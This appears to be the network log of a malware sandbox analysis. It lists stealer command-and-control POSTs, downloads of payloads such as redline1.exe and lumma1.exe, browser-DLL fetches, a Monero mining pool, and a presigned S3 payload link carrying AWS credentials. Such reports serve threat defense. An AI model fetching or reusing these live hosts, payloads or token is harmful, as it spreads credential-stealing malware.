                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:23 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=81
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  185.172.128.150:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c698e1bc8a2f5e6d.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC
                                                                                                                                                                                                                                                                  Host: 185.172.128.150
                                                                                                                                                                                                                                                                  Content-Length: 270
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:40:24 GMT
                                                                                                                                                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=80
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  20.157.87.45:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 300
                                                                                                                                                                                                                                                                  Host: svc.iolo.com
                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  cache-control: private
                                                                                                                                                                                                                                                                  content-length: 192
                                                                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  x-whom: Ioloweb7
                                                                                                                                                                                                                                                                  date: Sat, 11 May 2024 22:40:24 GMT
                                                                                                                                                                                                                                                                  set-cookie: SERVERID=svc7; path=/
                                                                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                                                                • 5.42.96.141:80
                                                                                                                                                                                                                                                                  http://5.42.96.141/go34ko8/index.php
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  1.6kB
                                                                                                                                                                                                                                                                  1.7kB
                                                                                                                                                                                                                                                                  14
                                                                                                                                                                                                                                                                  12

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.141/go34ko8/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.141/go34ko8/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.141/go34ko8/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.141/go34ko8/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.141/go34ko8/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 5.42.96.7:80
                                                                                                                                                                                                                                                                  http://5.42.96.7/cost/random.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  233.5kB
                                                                                                                                                                                                                                                                  6.9MB
                                                                                                                                                                                                                                                                  4925
                                                                                                                                                                                                                                                                  4923

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/cost/sarra.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/mine/amers.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/cost/random.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 5.42.96.7:80
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  240.1kB
                                                                                                                                                                                                                                                                  7.0MB
                                                                                                                                                                                                                                                                  5052
                                                                                                                                                                                                                                                                  5034

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/lend/alex.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/lend/gold.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/lend/redline1.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/lend/swizzhis.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/lend/udated.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/lend/lumma1.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.7/lend/deat.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://5.42.96.7/zamo7h/index.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 104.21.39.216:443
                                                                                                                                                                                                                                                                  zippyfinickysofwps.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.6kB
                                                                                                                                                                                                                                                                  7.6kB
                                                                                                                                                                                                                                                                  13
                                                                                                                                                                                                                                                                  12
                                                                                                                                                                                                                                                                • 185.172.128.33:8970
                                                                                                                                                                                                                                                                  keks.exe
                                                                                                                                                                                                                                                                  4.3MB
                                                                                                                                                                                                                                                                  81.8kB
                                                                                                                                                                                                                                                                  3255
                                                                                                                                                                                                                                                                  1676
                                                                                                                                                                                                                                                                • 104.21.59.156:443
                                                                                                                                                                                                                                                                  acceptabledcooeprs.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.6kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                • 172.67.192.5:443
                                                                                                                                                                                                                                                                  obsceneclassyjuwks.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  7.0kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                • 172.67.173.139:443
                                                                                                                                                                                                                                                                  miniaturefinerninewjs.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 104.21.53.146:443
                                                                                                                                                                                                                                                                  plaintediousidowsko.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 104.21.44.201:443
                                                                                                                                                                                                                                                                  sweetsquarediaslw.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 5.42.65.67:48396
                                                                                                                                                                                                                                                                  trf.exe
                                                                                                                                                                                                                                                                  4.0MB
                                                                                                                                                                                                                                                                  60.1kB
                                                                                                                                                                                                                                                                  3042
                                                                                                                                                                                                                                                                  1069
                                                                                                                                                                                                                                                                • 172.67.183.72:443
                                                                                                                                                                                                                                                                  holicisticscrarws.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.5kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 172.67.186.30:443
                                                                                                                                                                                                                                                                  boredimperissvieos.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.6kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                • 77.221.151.47:80
                                                                                                                                                                                                                                                                  http://77.221.151.47/install.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  152.7kB
                                                                                                                                                                                                                                                                  4.6MB
                                                                                                                                                                                                                                                                  3284
                                                                                                                                                                                                                                                                  3283

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://77.221.151.47/install.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 185.215.113.67:26260
                                                                                                                                                                                                                                                                  redline1.exe
                                                                                                                                                                                                                                                                  4.2MB
                                                                                                                                                                                                                                                                  70.6kB
                                                                                                                                                                                                                                                                  3043
                                                                                                                                                                                                                                                                  1438
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 49.13.229.86:80
                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  193.3kB
                                                                                                                                                                                                                                                                  5.4MB
                                                                                                                                                                                                                                                                  3917
                                                                                                                                                                                                                                                                  3911

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/sqlite3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/freebl3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/mozglue.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/msvcp140.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/nss3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/softokn3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://49.13.229.86/84bad7132df89fd7/vcruntime140.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://49.13.229.86/c73eed764cc59dcb.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 77.221.151.47:9090
                                                                                                                                                                                                                                                                  GameSyncLinks.exe
                                                                                                                                                                                                                                                                  450 B
                                                                                                                                                                                                                                                                  608 B
                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                • 172.67.183.72:443
                                                                                                                                                                                                                                                                  holicisticscrarws.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.6kB
                                                                                                                                                                                                                                                                  7.6kB
                                                                                                                                                                                                                                                                  13
                                                                                                                                                                                                                                                                  14
                                                                                                                                                                                                                                                                • 162.19.139.184:2222
                                                                                                                                                                                                                                                                  xmr.2miners.com
                                                                                                                                                                                                                                                                  910402.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  2.6kB
                                                                                                                                                                                                                                                                  12
                                                                                                                                                                                                                                                                  11
                                                                                                                                                                                                                                                                • 104.21.59.156:443
                                                                                                                                                                                                                                                                  acceptabledcooeprs.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.5kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 172.67.192.5:443
                                                                                                                                                                                                                                                                  obsceneclassyjuwks.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 104.21.39.216:443
                                                                                                                                                                                                                                                                  zippyfinickysofwps.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.6kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  399 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 172.67.173.139:443
                                                                                                                                                                                                                                                                  miniaturefinerninewjs.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.2kB
                                                                                                                                                                                                                                                                  7.0kB
                                                                                                                                                                                                                                                                  11
                                                                                                                                                                                                                                                                  11
                                                                                                                                                                                                                                                                • 104.21.53.146:443
                                                                                                                                                                                                                                                                  plaintediousidowsko.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 104.21.44.201:443
                                                                                                                                                                                                                                                                  sweetsquarediaslw.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 172.67.186.30:443
                                                                                                                                                                                                                                                                  boredimperissvieos.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.6kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                • 5.42.96.78:80
                                                                                                                                                                                                                                                                  http://5.42.96.78/files/file300un.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  1.1MB
                                                                                                                                                                                                                                                                  33.0MB
                                                                                                                                                                                                                                                                  23714
                                                                                                                                                                                                                                                                  23708

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.78/files/file300un.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 172.67.162.147:443
                                                                                                                                                                                                                                                                  smallelementyjdui.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.6kB
                                                                                                                                                                                                                                                                  7.6kB
                                                                                                                                                                                                                                                                  13
                                                                                                                                                                                                                                                                  15
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 172.67.169.40:443
                                                                                                                                                                                                                                                                  sofaprivateawarderysj.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 104.21.62.251:443
                                                                                                                                                                                                                                                                  lineagelasserytailsd.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 104.21.85.127:443
                                                                                                                                                                                                                                                                  tendencyportionjsuk.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.6kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                • 104.192.141.1:443
                                                                                                                                                                                                                                                                  https://bitbucket.org/qwizzi/tt522222/downloads/FlexPremises.exe
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  redline1.exe
                                                                                                                                                                                                                                                                  835 B
                                                                                                                                                                                                                                                                  8.2kB
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                  12

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://bitbucket.org/qwizzi/tt522222/downloads/FlexPremises.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  302
                                                                                                                                                                                                                                                                • 104.21.50.137:443
                                                                                                                                                                                                                                                                  headraisepresidensu.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.5kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 52.216.137.116:443
                                                                                                                                                                                                                                                                  https://bbuseruploads.s3.amazonaws.com/c238a61a-be46-44a2-84f2-dcbe608a006a/downloads/0c322e92-7ded-485f-8f7e-dcd768dac239/FlexPremises.exe?response-content-disposition=attachment%3B%20filename%3D%22FlexPremises.exe%22&AWSAccessKeyId=ASIA6KOSE3BNO4RKJTEI&Signature=fP4AUrYtuepo7A%2FvRAOkJQsOtrI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEOf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIDvhb6af67Krb7onSxljk0Aqra6ZXY41NU7th6kbhYRSAiEAmDF2SaO3kfBTtVPdXCHBPAq5lTpehQGYTB0J4l%2BA1xsqpwIIUBAAGgw5ODQ1MjUxMDExNDYiDFv9xPFrxdM19ack8yqEAhFcojSQlOF%2FVJvzcxdJBT7ZCnvBG9GNIq3q59d%2FB3xm5oyAnYumlVJ%2BOQHKR49A1ycXhIQBwCz52pGycgJ7p66AD9657Zj67Uz%2F6%2F9ZsqN%2B1hZdZUbSxQBuuJ7smHL0yswNqQfdCEQSwTMACfjmMtN1KE8%2Fo6IDu5D025IaIGF1basMzaL5xVWKk%2B%2FBl9IEeCLnwxIYxToHn7AMMhrrkblHwXlWwPbizegLza%2Fd4fla6TybOoTYPsvM5sHcePV%2Fu3Bc20oOYQQMnlinO6r18KOLi5ml4rZhhHiIQ3scew%2FHwbSJQJxS97n2Ert%2FUabD6vZSrug9Vz%2Fyr939%2B7JOksKXnw4WMKLh%2F7EGOp0BVIiB57FBNYWmI79hCIqoFho13KaTQm1SrlHd75jbvQY674dZYOj4%2BseJH0Bht3MvbcdE9W4ArD06tLMX8ttWLr5x4zfNzVJBexdZFqvHbO6tKkF8hWHbdb91QPThvlpnmfJhIHRLwfza6BvjDwVVZXbvXAjvuHhUoeGshdv8tTE6U5uD7zZP8M8dFbI%2FqVJveNoiSqAqGw5lfMDI0Q%3D%3D&Expires=1715468202
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  redline1.exe
                                                                                                                                                                                                                                                                  26.3kB
                                                                                                                                                                                                                                                                  876.5kB
                                                                                                                                                                                                                                                                  485
                                                                                                                                                                                                                                                                  640

                                                                                                                                                                                                                                                                  HTTP Request

